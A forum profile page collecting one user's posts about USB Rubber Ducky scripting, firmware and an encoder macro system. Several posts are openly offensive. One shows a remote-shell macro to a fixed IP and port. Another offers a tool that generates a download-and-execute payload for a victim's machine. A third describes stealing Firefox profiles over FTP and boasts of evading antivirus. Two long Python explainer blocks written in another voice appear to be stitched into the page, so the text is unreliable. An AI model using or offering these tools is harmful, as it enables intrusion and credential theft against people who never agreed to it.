
ApacheTech Consultancy

Active Members
Posts: 131
Days Won: 5

Everything posted by ApacheTech Consultancy

  1. Update: I've found something wrong with Visual Studio... ...Visual Studio 2012. It's unusable. It's horrible. I hate it. I hope Metro dies soon, and VS2012 dies along with it. I've literally now only just installed it and Microsoft have destroyed the best IDE on the market. It's vile. They destroyed Windows with Windows 8 and now they've destroyed VS with VS2012. Metro is the single worst mistake Microsoft have ever made and I hope it hurts them badly enough for them to ditch the whole stupid, useless and idiotic project. Stay away from VS2012 at all costs until someone can fix this utterly broken, piss-poor excuse for software. *sadface* R.I.P. Visual Studio. You will be sorely and bitterly missed.
  2. Am I right in thinking then that a single line: DELAY 2046 would fill the memory bank?
  3. How many lines depends on the length of the line. You have 2048 bytes. Each character is a byte. DELAY takes up byte space as well. Also, remember that 2049 bytes won't work; if the file says 2KB, make sure it is exactly 2KB. 2047 bytes will read as 1KB. If, when you put the duck into the PC, NUM_LOCK is enabled, inject.bin will fire. If, when you put the duck into the PC, CAPS_LOCK is enabled, inject2.bin will fire. Take the Duck out and replace it if you want the other script to trigger.
  4. It's probably better to future-proof as early as possible. I'd go with a full rebuild because if there are breaking changes in the latest version, they will affect any subsequent versions as well. Develop it over time though; the firmwares we have out now will suffice for almost all purposes. Any new features that the new Atmel version can bring will be useful and will aid development in the future. We don't want to be stuck with legacy code which hinders development.
  5. To be pedantic: HTML, PHP, JavaScript and CSS are not programming languages. They are scripting languages. Syntactically, VB.NET is probably the easiest programming language to pick up, and (more or less) converts straight to C# when you're ready to learn that. If you're already familiar with the C-style syntax (PHP, JavaScript), maybe go straight for C#. Visual Studio is the best IDE I've ever used; it's massively extensible, extremely friendly for beginners and experts alike. It is miles ahead of every single other IDE I've come across. You can use it for C, C++, C#, VB, VB.NET, F#, Java, Arduino, Python, Perl, PHP, HTML, CSS, JavaScript and more. For web development it comes with its own dedicated test server with a full debugging platform. There's nothing I can really say bad about it.
  6. Seeing as though Java is supposed to be an OOP-centric language, it is utterly terrible when it comes to handling objects. Some of even the most basic operations are either impossible, only available through reflection (which should be used as a last resort according to programming best practice), or horrendously long-winded and convoluted. There's no such thing as a delegate, or a predicate; their idea of lambda expressions is laughable; you can't even cast between a generic collection and an array of the same type! I've only been programming in Java for a week and already I despise it! I don't mind writing my own helper or wrapper classes, so long as the basic tools are available to use them in an elegant way. Anonymous inner classes are ugly and pale in comparison to anonymous methods and block initialisers. The way they handle properties is ugly as well. I miss simple tools like typeof. Why don't ArrayLists come with a top-level iterator? Why can't overloaded methods have different return types? Why can't you cast between a generic list of a type and an array of the same type? Why can't you declare method signatures as types? Grr! Silly Java! *launches Visual Studio and breathes a sigh of relief* Don't worry VS, I'll never leave you. I missed you so much!
  7. Java might be the way to go with malicious payloads tbh. They're rarely blacklisted by corporate firewalls; they're not on the standard executable blacklist; they're not included in any real-time scanning of executables by AV; they have their own manifests in them to elevate authorisation; they are cross-platform; they're archives in their own right so can be used as "trojan" zip files; they're modular and can replicate on command; they download their own dependencies. Theoretically, because a car's onboard computer runs off Java, if you have a new car with a USB port on the dash, you could create a JAR attack to reset your milometer; or as a security device which totally bricks the car overnight, then flashes the ROM when you want to drive away in the morning.
  8. If you want to run a cross-platform program, it would be best written as a Java JAR file. Then, all you're worried about is whether they have Java installed. But, even then, the execution of that file will be different on each OS: cmd vs. term vs. whatever it is for Mac (???) etc. At the moment, there's not a firmware which can detect the OS and run a script based on that detection. Until then, you're best off directing each script towards a specific OS.
  9. Is it possible, with the firmware, to read from a compressed file and expand it into memory? Thinking of which, how would one start developing firmware?
  10. So, you didn't have script.txt in the same directory as encoder.jar? You do need to fully qualify the path to the input file; there's no "default" input file at this time. If using duckling macros, you don't need to have the .txt script in the ducklings subdirectory; it will work from any directory, so long as it's qualified (absolute or relative). The ducklings are imported with an "all or nothing" approach. If they're not imported properly, the program will exit with an error.
  11. The USB Mass Storage Device firmware does not have the HID stuff in it; the triggers are only activated when the device is first inserted. Pressing NUM_LOCK will have no effect when it comes to chain-loading scripts, so far as I know. As mentioned, everything is explained in detail on the wiki.
  12. I didn't think Konboot ever worked on Windows 7, regardless of architecture. I've never seen it work anyway.
  13. Try running it through the Duck Encoder v2.4, available in the stickies. If it works on that then please give feedback. The new release has been greatly altered since that one; it would be good to know if I've broken anything. Can you post the actual text file you are trying to encode? Can you also please run the faulty code in debug mode and post the resulting stack trace? A screenshot will suffice if you can't cut and paste.

        java -jar encoder.jar -i script.txt --debug
  14. What is a Duckling?

    New to Duck Encoder v3.0.0, Ducklings are JAR files full of stored procedures or macros which can make writing DuckyScripts a lot easier and more streamlined. They are housed within the "ducklings" sub-directory, wherever your encoder is installed. Ducklings use a similar syntax to regular DuckyScript, but introduce a new prefixed namespace for each Duckling:

        NAMESPACE::COMMAND arguments

    The namespace for each duckling will be described within its documentation, and can be found by executing the .duckling.jar file. This will also list all the syntax available within the duckling, as well as details about the author, version and so forth.

        java -jar SamplePack.duckling.jar

    Ducklings are currently in open beta until we gain enough feedback to confirm they are stable. Please help us with this task and send us your feedback.

    So, how do they work?

    Ducklings work by resolving a single-line entry into a multi-line script snippet, inline with where it needs to be in the code. It is possible to use multiple ducklings within the same script; it is even possible to nest duckling macros inside each other, so long as all dependency files are available when the script is encoded. The main limitation is that the REPEAT command will merely repeat the last line of the stored procedure, not the macro itself. This will hopefully be resolved in a later version, once the Ducklings are known to be fully stable.

    Within the SamplePack.duckling.jar included within the v3.0.0 release of the encoder, there is a single macro called "HELLOWORLD", and the namespace for the Duckling is "SAMPLE". To use this within a script, we use the new namespacing syntax:

        SAMPLE::HELLOWORLD It Works! :D

    This is then translated, inline, into the following script when it is encoded:

        STRING Hello World!
        STRING You Wrote: It Works! :D

    Obviously, this is only a very basic example, but pretty much any payload can be stored within a duckling and executed using a single line.

    Example:

        REM Runs a Remote Shell to 192.168.1.7 on port 2600.
        WINNET::RSHELL host 192.168.1.7 sap 2600

    How do I create my own Duckling?

    The source code for the ducklings is available here:
    Zip: http://ducky-decode.googlecode.com/files/SamplePack.duckling.zip (7ac17bc509334fb92b8f5b8e193a9b822b7b31ca)
    Svn: http://code.google.com/p/ducky-decode/source/browse/#svn/trunk/Ducklings/v1/SamplePack.duckling

    A basic knowledge of Java (or at least C-style syntax) is needed until a generator is developed. The source code is relatively self-explanatory; I created the ducklings from scratch after only four days of ever coding in Java, so it's not overly complicated at all. The only files we're interested in are the Duckling.java file and the Main.java.

    Duckling.java:

    First, we need to set the namespace for the duckling:

        /**
         * TODO: Set the namespace for the duckling.
         */
        private String mNamespace = "WINNET";

    Then, declare a new macro and add it to the macro list. The arguments ([host-ip] and [port-number]) are put in place using the standard Java %s string substitution method. Make sure your arguments go in order of where your %s placeholders are within the script. Within the initialiser, the arguments are only for the documentation, but their order is vitally important.

    As the ducklings develop, more features will be added, but due to their structure and the development process they will go through, I'm afraid we cannot guarantee any backwards compatibility between subversions of the duckling source.

    Main.java:

    Here, all we need to change is the personal information about the duckling.

        private static String Title = "Windows Network and Internet Tools";
        private static String Version = "1.0.0.a";
        private static String Author = "Apache - ApacheTech Consultancy";

    Then just export the project as a runnable JAR file (the procedure differs on various IDEs) and you're done.

    Again, please let us know your feedback and any suggestions you may have for development.

    Developer Info:
    Duckling Development Stage: Open Beta
    Duckling Factory Development Stage: Pre-Alpha
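The macro resolution the post describes (a NAMESPACE::COMMAND line expanded inline into a multi-line snippet, %s placeholders filled from the arguments in order, macros nesting inside macros) as an added, stand-alone Python example. This is not the encoder's or the Duckling JAR's code; it is written to show the expansion step in a form that runs offline. The macro table is constructed here: SAMPLE::HELLOWORLD mirrors the post's example, while SAMPLE::GREET and NET::CONNECT are hypothetical extras added to exercise nesting and multi-argument macros. The argument convention (a single-%s macro takes the whole remainder of the line, a multi-%s macro splits it on whitespace) and the nesting depth limit are assumptions, not documented encoder behaviour.

```python
"""Duckling-style macro expander for DuckyScript (illustration only)."""
import re

# NAMESPACE::COMMAND [arguments...]  -- the namespacing syntax from the post.
MACRO_RE = re.compile(r"^([A-Z][A-Z0-9_]*)::([A-Z][A-Z0-9_]*)(?:\s+(.*))?$")

# Constructed macro tables standing in for the .duckling.jar files.
# SAMPLE::HELLOWORLD mirrors the post; GREET and NET::CONNECT are hypothetical.
DUCKLINGS = {
    "SAMPLE": {
        "HELLOWORLD": ["STRING Hello World!", "STRING You Wrote: %s"],
        "GREET": ["DELAY 200", "SAMPLE::HELLOWORLD %s"],   # nested macro
    },
    "NET": {
        "CONNECT": ["STRING nc %s %s", "ENTER"],          # two ordered %s slots
    },
}


def _fill(template, args):
    """Replace each %s in template with the next argument, left to right."""
    parts = template.split("%s")
    out = parts[0]
    for part in parts[1:]:
        out += next(args) + part
    return out


def _expand_line(line, ducklings, depth, lineno):
    m = MACRO_RE.match(line.strip())
    if not m:
        return [line]                      # plain DuckyScript passes through
    if depth == 0:
        raise ValueError(f"line {lineno}: macro nesting too deep (recursive duckling?)")
    ns, cmd, rest = m.group(1), m.group(2), (m.group(3) or "").strip()
    try:
        body = ducklings[ns][cmd]
    except KeyError:
        # "all or nothing": an unknown macro aborts the whole encode
        raise ValueError(f"line {lineno}: unknown macro {ns}::{cmd}") from None
    slots = sum(t.count("%s") for t in body)
    # Assumed convention: one slot takes the whole remainder (so "It Works! :D"
    # stays intact); several slots are filled from whitespace-separated tokens.
    if slots == 1:
        args = [rest]
    elif slots > 1:
        args = rest.split(None, slots - 1)
    else:
        args = []
    if slots > 0 and (len(args) != slots or args == [""]):
        raise ValueError(f"line {lineno}: {ns}::{cmd} expects {slots} argument(s)")
    it = iter(args)
    expanded = []
    for template in body:
        # Fill this line's placeholders, then expand it again in case the
        # stored procedure itself contains another NAMESPACE::COMMAND line.
        expanded.extend(_expand_line(_fill(template, it), ducklings, depth - 1, lineno))
    return expanded


def expand_script(lines, ducklings=DUCKLINGS, max_depth=8):
    """Resolve every macro line into plain DuckyScript; raises on the first bad macro."""
    out = []
    for lineno, line in enumerate(lines, 1):
        out.extend(_expand_line(line.rstrip("\r\n"), ducklings, max_depth, lineno))
    return out


if __name__ == "__main__":
    demo = ["REM Duckling demo",
            "SAMPLE::HELLOWORLD It Works! :D",
            "NET::CONNECT 192.168.1.7 2600"]
    print("\n".join(expand_script(demo)))
```

Because expansion happens before encoding, a REPEAT following a macro line sees only the last expanded line, which is exactly the limitation the post mentions. The depth limit is there because a macro that (directly or through another duckling) references itself would otherwise expand forever; the real encoder's behaviour in that case is not stated on the page.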
  15. I use the TwinDuck v2.1 firmware at the moment. While I'm developing, it's nice to have the Pen Drive access so I'm not constantly swapping drives. Just load a new inject.bin and press the button. I'm waiting for the MultiDuck firmware to come out, I'd like the TwinDuck and MultiplePayloadDuck firmwares to be combined, giving UMD access and four possible scripts to run. Any v2+ firmware is compatible with the latest hardware. You may find difficulty running some of the latest scripts on the v1 and stock. There's a noted speed increase as well with the v2 over the v1 when running it as a USB Pen Drive.
  16. There's a sticky thread (http://forums.hak5.org/index.php?/topic/28254-tutorial-re-flashingupgrading-the-ducky-winxp-32bit/) that tells you everything you need to know about this. It includes a link to the dev site to download (and view information about) the various firmwares:
    Firmware to Support HID on Windows, Linux, Mac OS X, Android & iOS
    Firmware to Support Mass Storage (acts like USB Drive)
    Firmware to Support Multiple Payloads in HID mode (Triggers via Keyboard LEDs)
    Firmware Composite Device; Mass Storage & Keyboard, Language Independent
  17. I ended up using 0MQ (http://zguide.zeromq.org/page:all), which makes it wonderfully easy to create various forms of message queues. I'm using the Pub/Sub pattern over TCP on port 2600.

        using System.Text;
        using ZMQ;

        // One context per process; the argument is the number of I/O threads.
        ZMQ.Context context = new ZMQ.Context(1);
        ZMQ.Socket publisher = context.Socket(ZMQ.SocketType.PUB);
        // Bind on all interfaces, TCP port 2600.
        publisher.Bind("tcp://*:2600");
        // Or: publisher.Bind(ZMQ.Transport.TCP, "*", 2600);
        publisher.Send("Hello World!", Encoding.Unicode);

    The library works in the following languages: It's one of the most versatile libraries I've ever seen. :D
  18. The step by step instruction guide is easy to follow. Not idiot proof, but it's a good guide. I'd never done anything like it before and it worked first time. So far as I know, it's nigh on impossible to brick the duck. So long as you follow the guide to the letter, you should be fine. Read the guide first, download all the gear you need and set it all up ready to go. If you feel even semi confident about it, go for it. We're here to assist if you need, but trying it for yourself first will greatly increase your confidence and competence with the hardware itself.
  19. The TwinDuck firmware allows you to use the Duck as a Mass Storage Device, as well as a HID. There is a step-by-step guide to flashing your duck with the new firmware in the Stickies on the forum. Which duck are you using currently, i.e. what colour is the board? This will give us an indication of which stock firmware you are currently using. It is possible that commands which have either been added or deprecated are causing errors with your compiler. If you use the TwinDuck Firmware, make sure you use the latest versions of the compiler and make sure your Java files are up to date (or at least Java 1.7.0). This will give you the best chance of completion.
  20. With the community we have on this forum as a whole, having a separate dedicated site is fairly redundant. I suppose there is also a lot more foot traffic through here that wouldn't have otherwise gone to a dedicated site.
  21. That's not what this release is designed for. This is designed to download a file straight from the internet and execute it on the victim's computer. The script it's based on is here: http://forums.hak5.org/index.php?/topic/25177-payload-powershell-downloadexecute/#entry193195
  22. Version: 1.0.0.0 (Initial Release).
    Architecture: Windows 32-bit (should work on 64-bit, but untested).
    Usage: Enter the URL of the executable file, click generate and choose the output folder.
    Output: inject.bin payload file, in a chosen directory.
    Written By: Apache
    Copyright: ApacheTech Consultancy, 2013.
    License: OPEN SOURCE FREEWARE. Permission granted for reproduction. Please give credit where credit is due.
    Acknowledgements:
    George Cost: http://www.4shared.com/u/VMsAhm-b/whoknows.html
    Un4seen: http://www.un4seen.com/
    Mubix: http://forums.hak5.org/index.php?/topic/25177-payload-powershell-downloadexecute/#entry193195
    Alex Aza: http://stackoverflow.com/questions/6317457/error-while-reading-embedded-resource-into-byte-array-c/6317469#6317469
    HashInfo:
    # MD5 checksums generated by MD5summer (http://www.md5summer.org)
    # Generated 01/03/2013 15:02:13
    ba2bfd8b5f53a44b86e6fe540ac4c89e *WgetAndExecuteScriptGenerator.rar
    Download (Source and Binaries): WgetAndExecuteScriptGenerator.rar
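The release above ships an MD5summer listing next to the download. Checking a file against that listing is the one step a reader should actually do before running the archive, so here is an added Python example of it; this is not the tool's code or the poster's. The listing and file contents below are constructed: the digests are the well-known MD5 values of the strings "abc" and "The quick brown fox jumps over the lazy dog", not of the real WgetAndExecuteScriptGenerator.rar, and the second file is deliberately altered so that one entry fails.

```python
"""Verify files against an MD5summer-style checksum listing (illustration only)."""
import hashlib
import hmac

# Constructed listing in MD5summer's format: '#' comment lines, then
# "<md5 hex> *<filename>" (the '*' marks binary mode). Digests are those of
# the constructed file contents below, not of the real release archive.
LISTING = """\
# MD5 checksums generated by MD5summer (http://www.md5summer.org)
# Generated 01/03/2013 15:02:13
900150983cd24fb0d6963f7d28e17f72 *payload.rar
9e107d9d372bb6826bd81d3542a419d6 *README.txt
"""

# Constructed stand-in downloads; README.txt has been tampered with ("cat").
FILES = {
    "payload.rar": b"abc",
    "README.txt": b"The quick brown fox jumps over the lazy cat",
    "extra.bin": b"not in the listing",
}


def parse_md5summer(text):
    """Map filename -> expected lowercase hex digest, skipping comments and blanks."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, name = line.split(None, 1)
        expected[name.lstrip("*")] = digest.lower()
    return expected


def verify_files(listing, files):
    """Return filename -> True (match), False (mismatch) or None (not listed)."""
    expected = parse_md5summer(listing)
    results = {}
    for name, data in files.items():
        if name not in expected:
            results[name] = None          # nothing to check against
            continue
        actual = hashlib.md5(data).hexdigest()
        # compare_digest avoids leaking how many leading characters matched.
        results[name] = hmac.compare_digest(actual, expected[name])
    return results


if __name__ == "__main__":
    for name, ok in verify_files(LISTING, FILES).items():
        state = "OK" if ok else ("MISMATCH" if ok is False else "not listed")
        print(f"{name}: {state}")
```

A checksum posted in the same place as the download only detects a corrupted or accidentally swapped file; anyone who can replace the archive can replace the listing too, and MD5 is collision-broken besides. It is an integrity check, not proof of who built the archive.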
  23. Well, I'm an undergrad student who is looking for a final year project for my degree. :p I have no real background in firmware though, or C.
  24. The FTP Wrapper class I'm using is here: http://netftp.codeplex.com/releases/view/95632 The main bulk of the program is written using Extension Methods. These are the main ones. Please excuse the lack of annotation. Then, just a very simple controller class for the victim. And finally, the file lists themselves: Once you have all that, it's relatively self-explanatory what goes where.

        FFE.FullProfilesList.ForEach((p) => p.Upload("Firefox", Victim.FirefoxProfiles));

    It's fully undetected on all of the online AV scraper sites I've tried.